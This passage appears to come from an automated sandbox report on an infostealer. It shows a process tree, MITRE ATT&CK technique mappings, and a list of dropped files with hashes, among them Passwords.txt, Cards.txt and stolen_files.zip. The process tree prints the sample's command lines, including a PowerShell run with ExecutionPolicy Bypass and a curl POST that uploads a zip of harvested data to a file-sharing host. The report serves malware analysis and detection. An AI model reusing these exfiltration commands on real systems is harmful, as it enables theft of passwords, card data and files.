    - Suspicious behavior: EnumeratesProcesses
    PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4100
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:1476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Erhqjvyq.zip";"
  2⤵
  PID:2416
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Erhqjvyq.zip";
    3⤵
    PID:4212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-Erhqjvyq.zip

Filesize
1.4MB

MD5
fc9699e6680f11a2b09f0172330417de

SHA1
60cdcc10acd76ca911edd780213da31df23ff127

SHA256
d518683c62c8979986bb33d696212081308461211bcfe491a498f15708acde77

SHA512
bc50bbaa9a1f554f61086c57329ca566df915b05362d91c491a9857ab5df0405d46e42ced26eef760da9bda10ec2a22ecff5e325db88788ef6733d763f72f257

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\Serial-Check.txt

Filesize
511B

MD5
fadd2fdbf159718abc1dfb4744347de0

SHA1
3a593b4feb5ae15364105f25a6702cafe198832b

SHA256
9b29a49083ddc87c2d27c50970d5812709f19bba657ee105c29c04fb7f952b5a

SHA512
7a79ddb56f61033e73ecf9c360cc37e87fb1e5a319758fb8e720ef3188e544a20e131f290c16dde9ec20f0638fd76622d4c190e84fb1071c5a802888a0f16956

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\debug.log

Filesize
1KB

MD5
458a02acc38af54e1add12fed5399ed1

SHA1
f0e545341f6ff5e80044b618c2a5fe67f8170b4a

SHA256
913fd4f632fd15df036dfa0a78a224478aca3cf719c787108c01ddef9f48ca95

SHA512
48b8bf34ec7174d963e0c22714ce452c742e25c202a901d195746bdcd6674760dc3aad3408ab5433ca8f1c36ed5195a185c964518b0ef1f0eb4d961e934b45c4

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\debug.log

Filesize
1KB

MD5
1009e1046ce0b005db5e9a3ce4a1220d

SHA1
5c23f05a5bd9a101553b7e06411b7e3d355dbe30

SHA256
19f8294e8743095c97a8dbc71e344f4f6f823766b5845d310b501783313907ca

SHA512
c1e1b571138c18abd72507d923c854a8ee3b5a71a2dd0e57af39d426dbe160bd880aa6deb800490bd3e28fb8b9b582c5dfc46390e0d2c943ce515da587dadc66

Download Submit
C:\ProgramData\Steam\Launcher\EN-Erhqjvyq\stolen_files.zip

Filesize
1.4MB

MD5
9da1950f679ec55c81274e088add9b95

SHA1
5d189c9d0f95039914b7abe9195f2d52f459a54a

SHA256
c58cbd5639c41bee44997d9299a4c23a352f2ec3686d228489359f15887a6e59

SHA512
4a72e7224938941fa02e3632a7849260386b3e52049ba296654306f6fe715d7dc1b7daad95a6cee8d9c84901dae3f483c79e54ce2336cb132d5d2ba93bd6f458

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
9d935264fe5b75cab75996a939092036

SHA1
c7e8e9fb6e953dd208860a94b1f66096bb623307

SHA256
bf7e8088d7ae986238fd97707596a30cf23daf03dca8278ea02e9ea5a1b8fcae

SHA512
ececb6d2ba1cd22623fca9035c6ab769765b59a7b3c1aab2b1835e2265ec59b7a8aa362e2cd9c22ff7c14274d495cc3acb813c8b136891fedcddfc3d4b7aae35

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e86a2f4d6dec82df96431112380a87e6

SHA1
2dc61fae82770528bee4fe5733a8ac3396012e79

SHA256
dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

SHA512
5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf5c5af87e23d85a8ffd526c59f55565

SHA1
55e97898ea968153fb9bd5865ccadc2a9b73250f

SHA256
a08522ec7efe1ff36a01ab8f20291af0a8f96bdd3f2bf5d442f48adb156e9392

SHA512
a19256c11ffae36ca6deae67aebc17f5796c67a55ddeaa3c6e8f61d42cacac0e1ad858d7993c67e01fea469ab81e4d1ba20b8a7653ed48f020ba887e996f117d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
45e855caf6416c7421aefa10280b7f6e

SHA1
36b9fe269a55d8f066b455fa5b236dc82f498ecf

SHA256
a38df3afff20b6433022d62ff3119144b5eae29e930bf448bae09c24e30b47db

SHA512
ab1baa0fc67d74fe8909974a03e8863003cd3e1695cb6fd7ea5033ccc762b76888001d8792ee9daf55a325157d3d3056a0325cd758182aff0e024cd54257c098

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
843236648c17e7b11d720f5613760d8a

SHA1
3817030c1334fee32e1c0e6ad08e9cc1392fbedb

SHA256
309c24cd0ff95d7ceb33d58b206fe5d1d31fedadaa36d6e71e2afd444184ea0d

SHA512
e2dbc0bba9dada38be74f7a1d4d4aac5ee60eaa78114643f02883973adfc45b7555cf580d70b541c8ee1626242c2ee61469577c0a17f13d0cd0303d402a8b3aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
e262e86ecae4ccaeaaa3f7e9f579a957

SHA1
eb8dad9db8cdff76641d7ce323f0bdf9f2d6602f

SHA256
cc2bcad35e8c8fff3ac293ff05e77658c781934c951dce3f8d0675c324b7ea00

SHA512
6d62402a07b4bdae548c83c14a0ac5790f5262b896794793897a22b4d5bc5a4a5f972f5b762ec94a9f16e81f064c5b16ad7f2b4a48d9010d318ec32548182a86

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7FBF.tmp

Filesize
1KB

MD5
11fd28d39df47d7b533063b97bb9d171

SHA1
25dd84099d487ad2a56d00f21a58b985be5f255b

SHA256
53fea24930b0eaf921eb9d621f121460ff542e8f2caa8a2d50c9457f86f592fa

SHA512
d57b50d5bb3b3b2f552b313117ad4981c55ad7237e2531586557a05ffbf08bd5aebcc5de67dbd7e16998df705c9e6bdb18231ad2b95e8b4132495fe28d1ee425

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES881C.tmp

Filesize
1KB

MD5
505b65c154ac2ebde9f01228e1ad7a14

SHA1
ba2ccbd453cc88e54e8ad1cee93811e3aaf0b832

SHA256
bf77d41a1fc123ab30c1d9364fa2a620fd5f7745b1f3ca398e57c430d934709f

SHA512
27f153af5782ac6422a1e1dba8b335b724ecf57d79d8427320decb96f408edaebec759370fd47809d32374d562c71c425f76d85197e51599a275fb97476ce960

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lvqi43k5.bmh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\avrlft3j\avrlft3j.dll

Filesize
3KB

MD5
55efe218d25f812659b911921a5ee587

SHA1
f38ee0e17d1ceda5d0dd966343a23c63fbd0a384

SHA256
4be41e2346813b683296ef673cad7195ce83713c630e1d427bc5fa22c4fbdd30

SHA512
1914232993725bd61ee5bc558031cad6b8e25c684146039b19a1b99bad5bdc890dd415c9be2d2ede37b2c3fb99b853adc67eea0c89d09fdaed4e2ce7166dc5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\e52f5da2d802660bd31a58bcd8791edb8SdnEz\ApproveBackup.pdf

Filesize
1.4MB

MD5
7d0fd8935995768be097070d3fd0e664

SHA1
8d640d0d0b2500f1cd67aa34eb8d2025fe33888b

SHA256
2bea76129bd83facb5032b97712b9a9bb04501917590c50dd6907a12cd3c0cc1

SHA512
82679dd92db3ef01c92a6469fa67ba27c518680cf28077bc80c958a44515f49f197bac00faa35f581a77632617352b6ab835e1bf4caeb353e14062d7857c06fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\nh1y3ziu\nh1y3ziu.dll

Filesize
3KB

MD5
2e3a163ddfbaa533e0be56122b61e7a4

SHA1
2d86febbd74f6d0094c979288ea95436bf921fe9

SHA256
71a8977f2d3bd102cfb1fece03068b841aad21e582e08034fe89de406cbfb70f

SHA512
38a4751c87a478b1358f97e2d63a56be1ed70e2a495ef8ea108bbb4826ca70f7168e6aee43e6d526c241ca8cfa0c7cb8e8442d565dfb0fed5e61f118fb4ecbc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\avrlft3j\CSC87C3F6CE2B134931B8302F8ACD14F9C4.TMP

Filesize
652B

MD5
c37d250d73e1b696e066b69e81791f54

SHA1
9fecdcf7756e78e82c9345e33b20d9cb21b5b09d

SHA256
8e647f80ee96cf92af3808d6a56852971311f1ce2b1a8436e3512a0d9a467fd3

SHA512
7528801e75aa82bbfc6c077b956c24a6fc804c9d57280c86270da2b7f40fb615a54b2eb7439e2e066cafe9012b05caf7bf59d94cfc3798e8b2aa9a199e3cd058

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\avrlft3j\avrlft3j.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\avrlft3j\avrlft3j.cmdline

Filesize
369B

MD5
660ada5e65fe19c70a7a5513fa638c44

SHA1
f1ab4b0810e67da19e8b28e5f3dc728fb1dc5c37

SHA256
23aea826c410f5af6563fb1130326b4edbe30a4e1bfbb88827eed641598edad3

SHA512
353e7d10f4f94232740359d0d6f504905ca23eaa1d0bc516963e6e56d72c3efadde3608bf795b47c2cfc006adb1591e923d3cc01ec40d614ba56bc01869e12fc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nh1y3ziu\CSC74DE58826678436387CF4891271BA99.TMP

Filesize
652B

MD5
3a414e82795eb06a48dfaf287ba73592

SHA1
1c7990102dd4956452b2f6ce9afe235f10c401a1

SHA256
f349b77908f97964db05f84a2cb401b66bdecdf4462473e7b014de7de2ff3de2

SHA512
8be933d8e09c936f4d66baefc3b34706ca8f6ddc8a472e7ead0d2ab08093970049be2886b2544b38e3ae306333eac23fa31f0bdbb6c033e1f83eaaf83873cb9b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nh1y3ziu\nh1y3ziu.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nh1y3ziu\nh1y3ziu.cmdline

Filesize
369B

MD5
6289db9e12bfc207e2e6505eb942700f

SHA1
a002c25a79a7ab57932c02bd0aa9dc6c12d5868f

SHA256
64242687117ca3a4426d8877fd479467d7eca329694bc6e8bcf0fa9b1e476712

SHA512
3c065d47f994e16dfc276bd5ecf8325e25a1298c8b967e1525260c66e8e6d93d7b0ac5657283e28c74483e09aa91e9dd5ac425a9be58a205b4531501fd4856f0

Download Submit
memory/944-86-0x000001DAFC070000-0x000001DAFC0E6000-memory.dmp

Filesize
472KB

Download
memory/944-85-0x000001DAFBFA0000-0x000001DAFBFE4000-memory.dmp

Filesize
272KB

Download
memory/944-84-0x00007FFAAA890000-0x00007FFAAB351000-memory.dmp

Filesize
10.8MB

Download
memory/944-83-0x00007FFAAA890000-0x00007FFAAB351000-memory.dmp

Filesize
10.8MB

Download
memory/944-78-0x000001DAFBAB0000-0x000001DAFBAD2000-memory.dmp

Filesize
136KB

Download
memory/944-72-0x00007FFAAA893000-0x00007FFAAA895000-memory.dmp

Filesize
8KB

Download
memory/944-99-0x000001DAF9920000-0x000001DAF9928000-memory.dmp

Filesize
32KB

Download
memory/944-103-0x00007FFAAA890000-0x00007FFAAB351000-memory.dmp

Filesize
10.8MB

Download
memory/2816-192-0x000001EE4E820000-0x000001EE4E828000-memory.dmp

Filesize
32KB

Download
memory/4952-115-0x0000010F61260000-0x0000010F612B0000-memory.dmp

Filesize
320KB

Download